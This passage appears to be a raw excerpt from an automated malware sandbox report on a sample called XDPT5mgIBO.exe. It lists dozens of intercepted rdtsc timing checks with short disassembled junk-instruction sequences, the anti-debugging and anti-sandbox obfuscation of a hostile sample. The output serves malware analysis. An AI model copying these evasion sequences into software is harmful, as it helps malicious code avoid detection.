0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5BCB0 second address: A5BCB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5C9FA second address: A5CA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5BCB4 second address: A5BCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5CA00 second address: A5CA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FA3D4C68E58h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5BCBD second address: A5BCC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5D882 second address: A5D887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5DA53 second address: A5DA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5DA58 second address: A5DA6E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FA3D4C68E56h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jl 00007FA3D4C68E5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5F9EE second address: A5F9F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5F9F2 second address: A5F9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5F9F8 second address: A5F9FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5F9FE second address: A5FA0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5FA0C second address: A5FA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5FA12 second address: A5FA17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A61C55 second address: A61C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A61C59 second address: A61C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A61C5D second address: A61C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA3D4D82111h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A62BC7 second address: A62BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E63h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A62BE7 second address: A62C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007FA3D4D82114h 0x0000000c popad 0x0000000d nop 0x0000000e cld 0x0000000f jl 00007FA3D4D82107h 0x00000015 cmc 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FA3D4D82108h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 call 00007FA3D4D8210Dh 0x00000037 js 00007FA3D4D8210Ch 0x0000003d sbb ebx, 398C1DA4h 0x00000043 pop edi 0x00000044 push 00000000h 0x00000046 or dword ptr [ebp+1247F98Ch], edi 0x0000004c jmp 00007FA3D4D82113h 0x00000051 push eax 0x00000052 pushad 0x00000053 push esi 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A62C64 second address: A62C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A62C6D second address: A62C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A64C6B second address: A64C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A64C6F second address: A64CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FA3D4D82108h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 jnp 00007FA3D4D82106h 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+122D210Ah] 0x00000032 push 00000000h 0x00000034 xor dword ptr [ebp+124502CAh], eax 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A64CB3 second address: A64CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A64CB9 second address: A64CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A62DF7 second address: A62DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65B96 second address: A65BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FA3D4D82106h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65BA1 second address: A65BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FA3D4C68E58h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 sbb ebx, 190826C1h 0x00000028 push 00000000h 0x0000002a mov bh, al 0x0000002c push 00000000h 0x0000002e movzx ebx, si 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jns 00007FA3D4C68E58h 0x0000003a push edx 0x0000003b pop edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65BE2 second address: A65BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65BE8 second address: A65BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65BEC second address: A65BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65BFC second address: A65C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65C01 second address: A65C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D82115h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A67F44 second address: A67F66 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA3D4C68E60h 0x0000000f popad 0x00000010 push eax 0x00000011 push edi 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A69FAF second address: A69FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A0CAAD second address: A0CAD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4C68E5Eh 0x00000009 jmp 00007FA3D4C68E68h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A0CAD7 second address: A0CAEC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA3D4D82106h 0x00000008 jp 00007FA3D4D82106h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A0952D second address: A0953D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FA3D4C68E56h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A0953D second address: A09541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A09541 second address: A09549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A09549 second address: A09569 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4D8210Ah 0x00000008 jmp 00007FA3D4D82111h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A09569 second address: A09572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A09572 second address: A09576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7905D second address: A79063 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A79063 second address: A79069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A79069 second address: A790AF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d ja 00007FA3D4C68E62h 0x00000013 jmp 00007FA3D4C68E5Ch 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007FA3D4C68E5Bh 0x00000023 jl 00007FA3D4C68E56h 0x00000029 popad 0x0000002a jl 00007FA3D4C68E58h 0x00000030 popad 0x00000031 mov eax, dword ptr [eax] 0x00000033 pushad 0x00000034 push edi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A790AF second address: A790C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnc 00007FA3D4D82110h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7C85F second address: A7C86F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4C68E56h 0x00000008 jg 00007FA3D4C68E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7C86F second address: A7C898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D82114h 0x00000009 jmp 00007FA3D4D82111h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7CFF8 second address: A7D020 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3D4C68E56h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push esi 0x0000000e jmp 00007FA3D4C68E62h 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007FA3D4C68E56h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7D2D1 second address: A7D2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4D82112h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7D2E8 second address: A7D301 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E62h 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA3B second address: A7DA41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA41 second address: A7DA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA45 second address: A7DA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FA3D4D8211Dh 0x0000000c jmp 00007FA3D4D82117h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA68 second address: A7DA83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA3D4C68E56h 0x0000000a jmp 00007FA3D4C68E61h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA83 second address: A7DA8D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA8D second address: A7DA91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8620C second address: A86210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A86210 second address: A86234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3D4C68E67h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A86234 second address: A86238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84EF0 second address: A84EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84EF6 second address: A84F1C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4D82106h 0x00000008 jmp 00007FA3D4D82114h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007FA3D4D82112h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84F1C second address: A84F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA3D4C68E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84F26 second address: A84F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D8210Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84F34 second address: A84F5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Fh 0x00000007 jl 00007FA3D4C68E56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FA3D4C68E5Eh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8522D second address: A85242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82111h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A854E7 second address: A854F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A854F1 second address: A85507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jns 00007FA3D4D82106h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A85507 second address: A85516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007FA3D4C68E5Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A85AE6 second address: A85AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A88E3A second address: A88E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A88E43 second address: A88E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA3D4D82106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A07B2D second address: A07B32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8E111 second address: A8E129 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e jg 00007FA3D4D8210Eh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A36A09 second address: A36A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A36A10 second address: A36A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82115h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8F085 second address: A8F097 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3D4C68E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8F097 second address: A8F0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3D4D82113h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8F0B1 second address: A8F0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8DA08 second address: A8DA17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8DA17 second address: A8DA28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA3D4C68E56h 0x00000009 jno 00007FA3D4C68E56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8DA28 second address: A8DA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A944C3 second address: A944CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FA3D4C68E56h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9342C second address: A93430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A93430 second address: A93476 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FA3D4C68E64h 0x00000012 jmp 00007FA3D4C68E5Eh 0x00000017 jmp 00007FA3D4C68E5Ah 0x0000001c jg 00007FA3D4C68E56h 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A93476 second address: A93491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4D82110h 0x00000008 jg 00007FA3D4D82106h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
